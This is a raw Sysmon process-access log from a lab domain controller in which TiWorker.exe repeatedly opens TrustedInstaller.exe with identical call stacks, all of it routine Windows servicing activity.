13:30:29.732{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012587Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.732{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012586Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.732{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012585Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.717{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012584Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.717{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012583Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.701{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012582Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.701{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012581Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.701{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012580Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.685{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012579Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.670{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012578Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.670{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012577Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.654{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012576Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.654{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012575Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.654{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012574Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.638{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012573Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.638{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012572Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.623{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012571Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.623{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012570Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 